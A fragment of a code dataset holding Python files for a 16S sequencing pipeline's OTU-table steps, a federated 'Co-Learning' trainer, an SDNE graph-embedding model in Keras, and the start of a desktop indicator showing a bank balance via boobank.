raw_data_file)\n\n # Step 1.2 - get split filenames\n split_filenames = []\n for c1 in ascii_lowercase:\n for c2 in ascii_lowercase:\n filename = 'x'+c1+c2\n if(os.path.isfile(filename)):\n split_filenames.append(filename)\n if len(split_filenames) == 0:\n split_filenames = [raw_data_file]\n raw_filenames = split_filenames\n\nelse:\n \n # If multiple raw sequence files are provided in a separate summary file, check integrity of the summary file and then extract raw file names.\n print('Reading fastqs from ' + raw_data_summary_file)\n with open(raw_data_summary_file, 'r') as fid:\n all_lines = fid.readlines()\n \n # Check for contents\n if len(all_lines) == 0:\n raise NameError(\"Raw data summary file named '\" + raw_data_summary_file + \"' appears to be empty. Check its contents.\")\n # Check for tab delimitation and empty space characters\n for line in all_lines:\n if len(line.split(' ')) > 1:\n raise NameError(\"Empty space characters detected in raw data summary file '\" + raw_data_summary_file + \"'. Please make tab-delimited.\")\n if len(line.split('\\t')) == 1:\n if len(line.rstrip('\\n')) > 0:\n raise NameError(\"No tab characters found in raw data summary file '\" + raw_data_summary_file + \"'. Please make tab-delimited.\")\n else:\n raise NameError(\"Empty lines found in raw data summary file '\" + raw_data_summary_file + \"'. Please remove these before proceeding.\")\n\n raw_filenames_orig = [os.path.join(options.input_dir, line.split('\\t')[0]) for line in all_lines if len(line.rstrip('\\n')) > 0]\n sampleID_map = [line.split('\\t')[1].rstrip('\\n') for line in all_lines if len(line.strip('\\n')) > 0]\n raw_filenames = [line.split('\\t')[0] for line in all_lines if len(line.rstrip('\\n')) > 0]\n for i in range(len(raw_filenames_orig)):\n cmd_str = 'cp ' + raw_filenames_orig[i] + ' ' + raw_filenames[i]\n os.system(cmd_str)\n split_filenames = raw_filenames\n\n\n# Do quality control steps (generate read length histograms etc.)\nQCpath = os.path.join(working_directory, 'quality_control')\ntry:\n os.system('mkdir ' + QCpath)\nexcept:\n print(\"Unable to create quality control directory. Already exists?\")\nQC.read_length_histogram(split_filenames[0], QCpath, raw_file_type)\n \n\n# Check whether samples need to be split by barcodes and primers need to be removed\nif (options.split_by_barcodes == 'True' and options.primers_removed == 'True' and options.multiple_raw_files == 'False'):\n # Copy the raw file into processed folder and call it trimmed by primers\n for split_filename in split_filenames:\n cmd_str = 'cp ' + split_filename + ' ' + split_filename + '.sb.pt'\n os.system(cmd_str)\n \n# Step 2 - loop through these split files and launch parallel threads as a function of the number of CPUs\ncpu_count = mp.cpu_count()\n\n# Step 2.1 - demultiplex, i.e. sort by barcode\nif (options.split_by_barcodes == 'False' and options.multiple_raw_files == 'False'):\n mode = summary_obj.attribute_value_16S['BARCODES_MODE']\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.sb' for f in filenames]\n barcodes_map_vect = [barcodes_map]*len(filenames)\n mode_vect = [mode]*len(filenames)\n pool.map(OTU.split_by_barcodes, zip(filenames, newfilenames, barcodes_map_vect, mode_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.sb' for f in split_filenames] \nelif (options.multiple_raw_files == 'True'):\n # If multiple raw files each corresponding to a sample are provided, rename sequence IDs according to the raw file summary sample IDs provided\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.sb' for f in filenames]\n pool.map(OTU.replace_seqIDs_for_demultiplexed_files, zip(filenames, newfilenames, sampleID_map))\n pool.close()\n pool.join()\n split_filenames = [f + '.sb' for f in split_filenames]\n\n# Step 2.2 - remove primers\nif (options.primers_removed == 'False'):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.pt' for f in filenames]\n primers_vect = [primers_file]*len(filenames)\n pool.map(OTU.remove_primers, zip(filenames, newfilenames, primers_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.pt' for f in split_filenames] \n\n\n# Step 2.3 - trim with quality filter\nif (raw_file_type == \"FASTQ\"):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.qt' for f in filenames]\n ascii_vect = [ascii_encoding]*len(filenames)\n\n pool.map(OTU.trim_quality, zip(filenames, newfilenames, ascii_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.qt' for f in split_filenames] \n\n\n# Step 2.4 - trim to uniform length of 101\ntry: \n length = summary_obj.attribute_value_16S['TRIM_LENGTH']\nexcept:\n length = 101\npool = mp.Pool(cpu_count)\nfilenames = split_filenames\nnewfilenames = [f + '.lt' for f in filenames]\nlength_vect = [length]*len(filenames)\nascii_vect = [ascii_encoding]*len(filenames)\n \nif (raw_file_type == \"FASTQ\"):\n pool.map(OTU.trim_length_fastq, zip(filenames, newfilenames, length_vect, ascii_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.lt' for f in split_filenames] \nelse:\n pool.map(OTU.trim_length_fasta, zip(filenames, newfilenames, length_vect))\n pool.close()\n pool.join()\n split_filenames = [f + '.lt' for f in split_filenames] \n\n# Step 2.5 - convert to FASTA format\nif (raw_file_type == \"FASTQ\"):\n pool = mp.Pool(cpu_count)\n filenames = split_filenames\n newfilenames = [f + '.fasta' for f in filenames]\n pool.map(frmt.fastq2fasta, zip(filenames, newfilenames))\n pool.close()\n pool.join()\n split_filenames = [f + '.fasta' for f in split_filenames] \n\n# Step 2.6 - renumber sequences IDs to be consistent across files\ntry:\n separator = summary_obj.attribute_value_16S['BARCODES_SEPARATOR']\nexcept:\n separator = '_'\nOTU.renumber_sequences(split_filenames, separator)\n\n\n# Step 3 - Recombine into a single fasta file\nif len(split_filenames)>1:\n cat_str = ['cat']\n for filename in split_filenames:\n cat_str.append(filename)\n cat_str = ' '.join(cat_str)\n cat_str = cat_str + ' > ' + fasta_trimmed \n # Recombine\n os.system(cat_str)\nelse:\n os.system('cp ' + split_filenames[0] + ' ' + fasta_trimmed)\n\n\n# Dereplicate sequences into a list of uniques for clustering\nOTU.dereplicate_and_sort(fasta_trimmed, fasta_dereplicated, dereplication_map, '_')\n\n# Remove chimeras and cluster OTUs\nOTU.remove_chimeras_and_cluster_OTUs(fasta_dereplicated, OTU_sequences_fasta, OTU_sequences_table, OTU_clustering_results, relabel=True, cluster_percentage=similarity)\n\n\n############################\n#\n# OTU and oligotype calling\n#\n############################\n\n# Build de novo oligotype table - annotate sequences as 'OTU_ID.oligotype_ID' and compute counts for each oligotype\nOTU.compute_oligotype_table(fasta_trimmed, fasta_dereplicated, OTU_clustering_results, '_', oligotype_table_filename)\n\n\n# Obtain Greengenes reference IDs for dereplicated sequences\nalignment_results = working_directory + '/gg_alignments.aln'\nuc_results = working_directory + '/gg_alignments.uc'\nsimilarity_float = float(similarity)/100\nGG_database_to_use = '/home/ubuntu/gg_13_5_otus/rep_set/' + str(int(similarity)) + '_otus.fasta'\nif not os.path.isfile(GG_database_to_use):\n raise NameError('Percent similarity ID (' + str(similarity) + '%) does not have a matching GG database. This will break downstream steps.')\ncmd_str = '/home/ubuntu/bin/usearch8 -usearch_local ' + fasta_dereplicated + ' -db ' + GG_database_to_use + ' -strand both -id ' + str(similarity_float) + ' -alnout ' + alignment_results + ' -uc ' + uc_results\nos.system(cmd_str)\n\n# Extract alignment dictionary\nOTU_GG_dict = OTU.parse_alignment(alignment_results)\n\n# Separate out GG-referenced reads from the rest which will be clustered as de novo OTUs\nGG_reads_fasta = os.path.join(working_directory, 'gg_reads.fasta')\ndenovo_reads_fasta = os.path.join(working_directory, 'denovo_reads.fasta')\nOTU.separate_GG_reads(fasta_dereplicated, OTU_GG_dict, GG_reads_fasta, denovo_reads_fasta)\n\n# Cluster remaining reads\ndenovo_OTU_sequences = os.path.join(working_directory, dataset_ID + '.denovo_otus.fasta')\ndenovo_OTU_seqs_table = os.path.join(working_directory, dataset_ID + '.denovo_otus.table')\ndenovo_clustering_results = os.path.join(working_directory, dataset_ID + '.denovo_clustering.tab')\nif os.path.isfile(denovo_reads_fasta):\n OTU.remove_chimeras_and_cluster_OTUs(denovo_reads_fasta, denovo_OTU_sequences, denovo_OTU_seqs_table, denovo_clustering_results, relabel=True, cluster_percentage=similarity)\n\n # Recompute a de novo oligotype table for de novo reads\n denovo_oligotype_table = os.path.join(working_directory, dataset_ID + '.denovo_oligotype_table.classic')\n denovo_only_otu_table = os.path.join(working_directory, dataset_ID + '.denovo_only_otu_table.classic')\n OTU.compute_oligotype_table(fasta_trimmed, denovo_reads_fasta, denovo_clustering_results, '_', denovo_oligotype_table)\n OTU.collapse_oligotypes(denovo_oligotype_table, denovo_only_otu_table)\n\n# Build 3 OTU tables - one completely de novo (equivalent to collapsed oligotype table)\n# - one only with OTUs that matched a Greengenes sequence (for use in PiCRUST)\n# - one open reference \n\n# De novo OTU table in classic dense format\nOTU_table_classic = OTU_table + '.classic'\nOTU.collapse_oligotypes(oligotype_table_filename, OTU_table_classic)\n\n# Closed reference OTU table (GreenGenes-referenced)\nOTU_table_gg = OTU_table + '.gg'\nOTU.build_GG_OTU_table(dereplication_map, OTU_GG_dict, OTU_table_gg)\n\n# Convert GG OTU to classic format\nOTU_table_gg_classic = OTU_table_gg + '.classic'\nfrmt.convert_OTU_to_classic_dense_format(OTU_table_gg, OTU_table_gg_classic)\n\n# Concatenate GG table and denovo table\nif os.path.isfile(denovo_reads_fasta):\n open_reference_OTU_table = OTU_table + '.open_ref.classic'\n OTU.concatenate_OTU_tables(OTU_table_gg_classic, denovo_only_otu_table, open_reference_OTU_table)\n\n\n# Convert OTU counts to relative abundances. These will become the default OTU tables.\nOTU_table_classic_relative_abundances = OTU_table + '.classic.relative'\nOTU_table_gg_classic_relative_abundances = OTU_table_gg + '.classic.relative'\nfrmt.convert_to_relative_abundances(OTU_table_classic, OTU_table_classic_relative_abundances)\nfrmt.convert_to_relative_abundances(OTU_table_gg_classic, OTU_table_gg_classic_relative_abundances)\n\n\n##################\n#\n# Basic quality control\n#\n###################\n\n# Print barplot of readcounts per sample\nQC.sample_read_counts(OTU_table_classic, QCpath)\n\n# Write out number of reads thrown out at each step\nQC.reads_thrown_out_at_each_step(raw_filenames, os.path.join(QCpath, 'processing_summary.txt'))\n\n\n#################################################\n#\n# Put all results and metadata file in a single folder\n#\n#################################################\n\ndataset_folder = dataset_ID + '_results'\ntry:\n os.system('mkdir ' + dataset_folder)\nexcept:\n print('Results directory already exists. Overwriting its contents.')\n\nos.system('cp -r ' + QCpath + ' ' + dataset_folder + '/.')\n\n# Open ref, closed ref, fully de novo and oligotype tables\ntry:\n os.system('cp ' + open_reference_OTU_table + ' ' + dataset_folder + '/.')\n os.system('cp ' + denovo_only_otu_table + ' ' + dataset_folder + '/.')\nexcept:\n skip\nos.system('cp ' + OTU_table_gg_classic + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_classic + ' ' + dataset_folder + '/.')\nos.system('cp ' + oligotype_table_filename + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_gg_classic_relative_abundances + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_table_classic_relative_abundances + ' ' + dataset_folder + '/.')\n\n# OTU sequences\nos.system('cp ' + OTU_sequences_table + ' ' + dataset_folder + '/.')\nos.system('cp ' + OTU_sequences_fasta + ' ' + dataset_folder + '/.')\n\nif metadata_file is not None:\n os.system('cp ' + options.input_dir + '/' + metadata_file + ' ' + dataset_folder + '/.')\n\n# Put the summary file in the folder and change the summary file path to its new location\nos.system('cp ' + summary_file + ' ' + dataset_folder + '/.')\nsummary_obj.summary_file = dataset_folder + '/summary_file.txt'\nsummary_obj.attribute_value_16S['OTU_TABLE_CLOSED_REF'] = ntpath.basename(OTU_table_gg)\nsummary_obj.attribute_value_16S['OTU_TABLE_DENOVO'] = ntpath.basename(OTU_table_classic)\nsummary_obj.attribute_value_16S['OLIGOTYPE_TABLE'] = ntpath.basename(oligotype_table_filename)\nsummary_obj.attribute_value_16S['OTU_SEQUENCES_TABLE'] = ntpath.basename(OTU_sequences_table)\nsummary_obj.attribute_value_16S['OTU_SEQUENCES_FASTA'] = ntpath.basename(OTU_sequences_fasta)\ntry:\n summary_obj.attribute_value_16S['METADATA_FILE'] = ntpath.basename(metadata_file)\nexcept:\n summary_obj.attribute_value_16S['METADATA_FILE'] = \"None\"\nsummary_obj.attribute_value_16S['PROCESSED'] = 'True'\nsummary_obj.WriteSummaryFile()\n\n\n# Transfer results \nprocessing_results_dir = '/home/ubuntu/processing_results'\nos.system('cp -r ' + os.path.join(working_directory, dataset_folder) + ' ' + processing_results_dir + '/.')\n\n'''\n# Transfer to PiCRUST server and wait for results\ncl = CommLink('proc')\nresults_folder = dataset_ID + '_results'\ntest = cl.launch_proc_listener(dataset_folder, results_folder)\n\n# Move results from inbox to results folder\nprocessing_results_dir = '/home/ubuntu/processing_results'\nos.system('mv /home/ubuntu/inbox/' + results_folder + ' ' + processing_results_dir + '/.')\nos.chdir(os.path.join(processing_results_dir, results_folder))\n\n\n# Extract features\nfeatures = Features('summary_file.txt')\nfeatures.LoadOTUtable()\nfeatures.LoadPredictedMetagenome()\nmetapredL1 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L1.biom')\nmetapredL2 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L2.biom')\nmetapredL3 = os.path.join('/home/ubuntu/processing_results', results_folder, 'picrust_results/CRC_Zhao_2012.L3.biom')\nfeatures.LoadPredictedMetagenome(metapredL1)\nfeatures.LoadPredictedMetagenome(metapredL2)\nfeatures.LoadPredictedMetagenome(metapredL3)\nfeatures.LoadPhylogeneticFeatures()\n\n# Pickle features\nwith open('pickled_features.pkl', 'wb') as fid:\n pickle.dump(features, fid)\n\n\n###################\n#\n# Final check - implement a better check in the future\n#\n###################\n\n\n# Check for file size greater than zero - add more thorough check eventually\notu_proc_success = False\nif(os.stat(OTU_table).st_size > 0 and os.stat(OTU_sequences_fasta).st_size > 0 and os.stat(OTU_sequences_table).st_size > 0):\n otu_proc_success = True\n\n# Processing complete - if successful, update summary file and write. Otherwise, leave untouched and exit.\nif(otu_proc_success == True):\n print(\"Successfully processed 16S data! Summary file has been updated.\")\nelse:\n print(\"Failed to process 16S data.\")\n\n'''\n\n","sub_path":"scripts/nraw2otu.py","file_name":"nraw2otu.py","file_ext":"py","file_size_in_byte":21710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"225306863","text":"from tensorflow.keras.callbacks import LearningRateScheduler\r\nimport numpy as np\r\nimport tensorflow.keras.backend as K\r\n# Local Imports\r\nfrom server import FLServer\r\nfrom client import FLClient\r\n\r\n\r\ndef choose_Et(previous_E, current_epoch, current_weights, previous_weights, epsilon=0.05):\r\n if current_epoch == 0:\r\n return previous_E\r\n prev_weight_sum = abs(np.sum(list(map(np.sum, previous_weights))))\r\n weight_diff = abs(np.sum(list(map(np.sum, [a_i - b_i for a_i, b_i in zip(current_weights, previous_weights)]))))\r\n if (weight_diff / (prev_weight_sum + K.epsilon())) <= epsilon:\r\n print('Double E in global epoch {}'.format(current_epoch))\r\n return 2 * previous_E\r\n else:\r\n return previous_E\r\n\r\n\r\nclass CoLearningClient(FLClient):\r\n def __init__(self, model, data, lr, decay_rate=0.25):\r\n super().__init__(model, data, lr)\r\n\r\n self.decay_rate = decay_rate\r\n self.lr = lr\r\n self.lr_scheduler = LearningRateScheduler(self.cyclical_lr)\r\n self.Et = None\r\n\r\n def train(self, current_epoch, current_weights, Et, B, _, verbose):\r\n self.Et = Et\r\n if B == 0:\r\n B = len(self.local_data.y_train)\r\n self.model.set_weights(current_weights)\r\n self.model.fit(self.local_data.x_train, self.local_data.y_train, batch_size=B,\r\n epochs=self.Et, shuffle=True, callbacks=[self.lr_scheduler], verbose=verbose)\r\n return self.model.get_weights()\r\n\r\n def cyclical_lr(self, epoch):\r\n # Epoch starts at 0, but has to start at 1 for Co-Learning\r\n return self.lr * np.power(self.decay_rate, (epoch+1) / self.Et)\r\n\r\n\r\nclass CoLearningServer(FLServer):\r\n def train(self, T, target_accuracy, verbose):\r\n roc = 0\r\n E = self.params['E']\r\n previous_weights = None\r\n while self.accuracy < target_accuracy and roc < T:\r\n w_t = self.model.get_weights()\r\n selected_clients = np.random.choice(list(self.clients.keys()),\r\n size=max(1, int(self.params['K']*self.params['C'])),\r\n replace=False)\r\n local_weights = []\r\n local_sizes = []\r\n if E < 100: # Threshold E to just over 100\r\n E = choose_Et(E, roc, w_t, previous_weights, self.params['epsilon'])\r\n for k in selected_clients:\r\n # Run local training\r\n current_local_weights = self.clients[k].train(roc, w_t, E, self.params['B'], None, verbose)\r\n local_weights.append(current_local_weights)\r\n local_sizes.append(self.clients[k].get_data_size())\r\n previous_weights = w_t\r\n self.aggregate_client_weights(local_weights, local_sizes)\r\n loss, accuracy, precision, recall, f1 = self.evaluate_model(verbose)\r\n self.accuracy = accuracy\r\n print('{} - Loss: {:.2f} Accuracy: {:.2f}\\n'.format(roc, loss, accuracy))\r\n roc += 1\r\n previous_weights = w_t\r\n return self.evaluate_model(verbose), roc\r\n\r\n def create_clients(self):\r\n for k in range(self.params['K']):\r\n self.clients[k] = CoLearningClient(self.model, self.dataset.get_local_data_for_client(k), self.params['lr'])\r\n","sub_path":"algorithms/colearning.py","file_name":"colearning.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"210081978","text":"\"\"\"\nOriginal code taken from\n - https://github.com/xiaohan2012/sdne-keras/blob/master/core.py\n - https://github.com/palash1992/GEM/tree/master/gem/embedding/sdne.py\nand modified/combined in this file\n\"\"\"\nimport math\nimport keras\nimport numpy as np\nimport keras.backend as K\nimport keras.models as KM\nimport keras.layers as KL\nfrom keras.optimizers import Adam\nimport keras.regularizers as Regularizers\n\n\ndef build_reconstruction_loss(beta):\n \"\"\"\n return the loss function for 2nd order proximity\n beta: the definition below Equation 3\"\"\"\n assert beta > 1\n\n def reconstruction_loss(true_y, pred_y):\n diff = K.square(true_y - pred_y)\n\n # borrowed from https://github.com/suanrong/SDNE/blob/master/model/sdne.py#L93\n weight = true_y * (beta - 1) + 1\n\n weighted_diff = diff * weight\n return K.mean(K.sum(weighted_diff, axis=1)) # mean square error\n\n return reconstruction_loss\n\n\ndef edge_wise_loss(true_y, embedding_diff):\n \"\"\"1st order proximity\n \"\"\"\n # true_y supposed to be None\n # we don't use it\n return K.mean(K.sum(K.square(embedding_diff), axis=1)) # mean square error\n\n\ndef train_data_generator(graph, encode_dim, batch_size=32):\n n = graph.vcount()\n m = graph.ecount()\n while True:\n for i in range(int(math.ceil(m / batch_size))):\n sel = slice(i * batch_size, (i + 1) * batch_size)\n batch_neighbors_a = []\n batch_neighbors_b = []\n batch_weight = []\n\n for edge in graph.es[sel]:\n neighbors_a = graph.neighbors(graph.vs[edge.source]['name'])\n neighbors_b = graph.neighbors(graph.vs[edge.target]['name'])\n weight = edge['weight']\n neig_a = np.zeros((n,))\n neig_a[neighbors_a] = 1.0\n batch_neighbors_a.append(neig_a)\n neig_b = np.zeros((n,))\n neig_b[neighbors_b] = 1.0\n batch_neighbors_b.append(neig_b)\n batch_weight.append(weight)\n\n batch_dummy = np.zeros((len(batch_neighbors_a), encode_dim))\n yield ([np.array(batch_neighbors_a), np.array(batch_neighbors_b), np.array(batch_weight)],\n [np.array(batch_neighbors_a), np.array(batch_neighbors_b), batch_dummy])\n\n\nclass SDNE:\n def __init__(self, n, d, beta, alpha, nu1,\n nu2, k, n_units, rho, n_iter, lr):\n \"\"\"\n :param n: number of nodes in the graph\n :type n: int\n :param d: dimension of the embedding\n :type d: int\n :param beta: penalty parameter in matrix B of 2nd order objective\n :type beta: float\n :param alpha: weighing hyperparameter for 1st order objective\n :type alpha: float\n :param nu1: L1-reg hyperparameter\n :type nu1: float\n :param nu2: L2-reg hyperparameter\n :type nu2: float\n :param k: number of hidden layers in encoder/decoder\n :type k: int\n :param n_units: list of length k containing number of units in hidden layers\n of encoder/decoder\n :type n_units: list(int)\n :param rho: bounding ratio for number of units in consecutive layers (< 1)\n :type rho: float\n :param n_iter: number of epochs\n :type n_iter: int\n :param lr: learning rate for the optimizer\n :type lr: float\n \"\"\"\n self.method_name = 'sdne'\n self.activation_fn = 'relu'\n self.n = n\n self.d = d\n self.beta = beta\n self.alpha = alpha\n self.nu1 = nu1\n self.nu2 = nu2\n self.k = k\n self.n_units = n_units\n self.rho = rho\n self.n_iter = n_iter\n self.lr = lr\n self.build()\n\n def build(self):\n # one end of an edge\n input_a = KL.Input(shape=(self.n,), name='input-a', dtype='float32')\n # the other end of an edge\n input_b = KL.Input(shape=(self.n,), name='input-b', dtype='float32')\n edge_weight = KL.Input(shape=(1,), name='edge_weight', dtype='float32')\n\n self.encoder = get_encoder(self.n, self.d, self.k, self.n_units, self.nu1, self.nu2, self.activation_fn)\n self.decoder = get_decoder(self.n, self.d, self.k, self.n_units, self.nu1, self.nu2, self.activation_fn)\n self.autoencoder = get_autoencoder(self.encoder, self.decoder)\n\n # Process inputs\n [decoded_a, encoded_a] = self.autoencoder(input_a)\n [decoded_b, encoded_b] = self.autoencoder(input_b)\n\n embedding_diff = KL.Subtract()([encoded_a, encoded_b])\n # add weight to diff\n embedding_diff = KL.Lambda(lambda x: x * edge_weight)(embedding_diff)\n\n self.model = KM.Model(inputs=[input_a, input_b, edge_weight],\n outputs=[decoded_a, decoded_b, embedding_diff])\n\n reconstruction_loss = build_reconstruction_loss(self.beta)\n opt = Adam(lr=self.lr, amsgrad=True)\n self.model.compile(optimizer=opt,\n loss=[reconstruction_loss, reconstruction_loss, edge_wise_loss],\n loss_weights=[1, 1, self.alpha])\n\n def fit(self, train_data_file, epochs, batch_size, steps_per_epoch, log=False):\n \"\"\"kwargs: keyword arguments passed to `model.fit`\"\"\"\n if log:\n callbacks = [keras.callbacks.TensorBoard(\n log_dir='./log', histogram_freq=0,\n write_graph=True, write_images=False)]\n else:\n callbacks = []\n\n gen = train_data_generator(train_data_file, self.d, batch_size=batch_size)\n\n self.model.fit_generator(gen, epochs=epochs, shuffle=True, callbacks=callbacks,\n steps_per_epoch=steps_per_epoch, verbose=1, use_multiprocessing=False)\n\n def save_node_embeddings(self, graph, output_file):\n \"\"\" Save node embeddings of the specified nodes into the output file\n\n :param graph: graph to save node embeddings\n :type graph: igraph Graph object\n :param output_file: file to save the result\n :type output_file: str\n :return: None\n \"\"\"\n m = graph.vcount()\n with open(output_file, 'w') as f:\n f.write(f'{m} {self.d}\\n')\n for node in graph.vs:\n node_name = node['name']\n neighbors = graph.neighbors(node_name)\n input_node = np.zeros((m,))\n input_node[neighbors] = 1.0\n embedding = self.encoder.predict(np.array([input_node]))[0].tolist()\n f.write(f\"{node_name} {' '.join(map(str, embedding))}\\n\")\n\n def save(self, path):\n self.model.save_weights(path)\n\n def load(self, path):\n self.model.load_weights(path, by_name=True)\n\n\ndef get_encoder(node_num, d, k, n_units, nu1, nu2, activation_fn):\n # Input\n x = KL.Input(shape=(node_num,))\n # Encoder layers\n y = [None] * (k + 2)\n y[0] = x # y[0] is assigned the input\n for i in range(k):\n y[i + 1] = KL.Dense(n_units[i], activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y[i])\n y[k] = KL.Dense(d, activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y[k - 1])\n # Encoder model\n encoder = KM.Model(inputs=x, outputs=y[k], name='encoder')\n return encoder\n\n\ndef get_decoder(node_num, d, k, n_units, nu1, nu2, activation_fn):\n # Input\n y = KL.Input(shape=(d,))\n # Decoder layers\n y_hat = [None] * (k + 2)\n y_hat[k+1] = y\n for i in range(k, 0, -1):\n y_hat[i] = KL.Dense(n_units[i - 1], activation=activation_fn,\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y_hat[i + 1])\n y_hat[0] = KL.Dense(node_num, activation='sigmoid',\n kernel_regularizer=Regularizers.l1_l2(l1=nu1, l2=nu2))(y_hat[1])\n # Output\n x_hat = y_hat[0] # decoder's output is also the actual output\n # Decoder Model\n decoder = KM.Model(inputs=y, outputs=x_hat, name='decoder')\n return decoder\n\n\ndef get_autoencoder(encoder, decoder):\n # Input\n x = KL.Input(shape=(encoder.layers[0].input_shape[1],))\n # Generate embedding\n y = encoder(x)\n # Generate reconstruction\n x_hat = decoder(y)\n # Autoencoder Model\n autoencoder = KM.Model(inputs=x, outputs=[x_hat, y], name='autoencoder')\n return autoencoder\n","sub_path":"model/graph_embedding_methods/sdne.py","file_name":"sdne.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"479034343","text":"#!/usr/bin/python2\n# -*- coding:Utf-8 -*-\n\n\"\"\"\nApp Indicator for Credit Mutuel (french bank) backend of boobank (weboob).\n\"\"\"\n\n# Imports ===============================================================#\n\nfrom __future__ import print_function\n\nimport sys\nimport gtk\nimport appindicator\n\nimport os\nimport commands\nimport subprocess\n\nimport webbrowser\n\nimport ConfigParser\n\n# Global variables ======================================================#\n\nICONS_PATH = os.path.dirname(os.path.realpath(__file__)) + '/icons/'\nICONS = {\n \"monochrome\":ICONS_PATH + \"cmu.png\",\n \"colored\":ICONS_PATH + \"cmu-color.png\"\n}\n\n# Classes ===============================================================#\n\nclass Configuration:\n def __init__(self,configfile=None):\n self.account_name = \"unnamed\"\n self.timeout = (60 * 10) * 1000\n self.icon_style = \"monochrome\"\n self.notifications = True\n\n self.conf_path = configfile\n\n if os.path.exists(os.path.realpath(configfile)):\n print (\"Loading {0} as configfile\".format(configfile))\n self.load(configfile)\n else:\n print (\"Writing {0} as configfile\".format(configfile))\n self.new_config_file(configfile)\n\n def load(self,configfile):\n def _str2vals(s):\n if s.lower() == \"true\":\n return True\n elif s.lower() == \"false\":\n return False\n elif s.lower() == \"none\":\n return None\n else:\n return s\n\n parser = ConfigParser.RawConfigParser()\n\n parser.read(configfile)\n\n if parser.has_option(\"update\",\"check_pause\"):\n self.timeout = int(parser.get(\"update\",\"check_pause\"))\n if parser.has_option(\"update\",\"account_name\"):\n self.account_name = parser.get(\"update\",\"account_name\")\n\n if parser.has_option(\"desktop\",\"notifications\"):\n self.notifications = _str2vals(parser.get(\"desktop\",\"notifications\"))\n if parser.has_option(\"desktop\",\"icon_style\"):\n self.icon_style = parser.get(\"desktop\",\"icon_style\")\n\n def new_config_file(self,configfile):\n def _bool2str(b):\n if b:\n return \"True\"\n else:\n return \"False\"\n\n parser = ConfigParser.RawConfigParser()\n\n parser.add_section(\"update\")\n parser.set(\"update\",\"account_name\",self.account_name)\n parser.set(\"update\",\"check_pause\",str(self.timeout))\n\n parser.add_section(\"desktop\")\n parser.set(\"desktop\",\"notifications\",_bool2str(self.notifications))\n parser.set(\"desktop\",\"icon_style\",self.icon_style)\n\n with open(configfile,\"w\") as cf:\n parser.write(cf)\n\nclass CheckCMU:\n def __init__(self,config):\n self.config = config\n self.current_account = None\n self.launched = True\n\n self.account_name = self.config.account_name\n self.notify = self.config.notifications\n\n self.ind = appindicator.Indicator(\n \"cmu-indicator\",\n \"bank-account\",\n appindicator.CATEGORY_APPLICATION_STATUS\n )\n\n if self.config.icon_style == \"monochrome\":\n self.ind.set_icon(ICONS[\"monochrome\"])\n elif self.config.icon_style == \"colored\":\n self.ind.set_icon(ICONS[\"colored\"])\n else:\n self.ind.set_icon(ICONS[\"colored\"])\n\n self.menu_setup()\n self.ind.set_menu(self.menu)\n\n def menu_setup(self):\n self.menu = gtk.Menu()\n\n self.account_item = gtk.MenuItem(\"0 € (rafraichir)\")\n self.account_item.connect(\"activate\",self.refresh_click)\n self._refresh()\n\n self.web_item = gtk.MenuItem(\"Site web Crédit Mutuel\")\n self.web_item.connect(\"activate\", self.open_web)\n\n self.conf_item = gtk.MenuItem(\"Configuration\")\n self.conf_item.connect(\"activate\", self.edit_config)\n\n self.quit_item = gtk.MenuItem(\"Quitter\")\n self.quit_item.connect(\"activate\", self.quit)\n\n\n for menu_item in [\n self.account_item,\n self.web_item,\n self.conf_item,\n self.quit_item]:\n\n menu_item.show()\n self.menu.append(menu_item)\n\n if self.launched:\n self.launched = False\n\n def main(self):\n if self.config.timeout:\n if self.config.timeout > 0:\n gtk.timeout_add(self.config.timeout, self._refresh)\n\n if self.launched:\n print (\"Starting CMU Indicator\")\n\n if notify:\n os.system(\"notify-send 'CMU Indicator' 'Chargement...'\")\n\n gtk.main()\n\n def open_web(self,widget):\n webbrowser.open(\"https://www.creditmutuel.fr\")\n\n def refresh_click(self, widget):\n self._refresh()\n\n def edit_config(self,widget):\n subprocess.Popen([\"xdg-open\",self.config.conf_path])\n\n def _refresh(self):\n def weboob(account_name):\n print (\"{0} Reloading weboob configuration {0}\".format(5*\"=\"))\n os.system(\"weboob-config update\")\n print (\"{0}================================{0}\".format(5*\"=\"))\n\n out = commands.getoutput(\n 'boobank list | grep \"{0}\"'.format(account_name)\n )\n\n if out:\n money = out.split()[-1]\n\n return money\n\n else:\n print (\"Updating: get nothing!\")\n return None\n\n print (\"Updating...\")\n\n if self.notify and not self.launched:\n os.system(\"notify-send 'CMU Indicator' 'Rafraichissement en cours...'\")\n\n ca = weboob(self.account_name)\n\n if ca is None:\n if self.current_account is None:\n self.current_account = 0\n self.account_item.set_label(\"0 € (rafraichir)\".format(self.current_account))\n else:\n self.account_item.set_label(\"{0} € (rafraichir)\".format(self.current_account))\n else:\n self.current_account = float(ca)\n\n self.account_item.set_label(\"{0} €\".format(self.current_account))\n\n if self.notify and not self.launched:\n os.system(\"notify-send 'CMU Indicator' 'Rafraichissement fini'\")\n\n self.ind.set_status(appindicator.STATUS_ACTIVE)\n\n return True\n\n def quit(self, widget):\n sys.exit(0)\n\n# Programme =============================================================#\n\nif __name__ == \"__main__\":\n 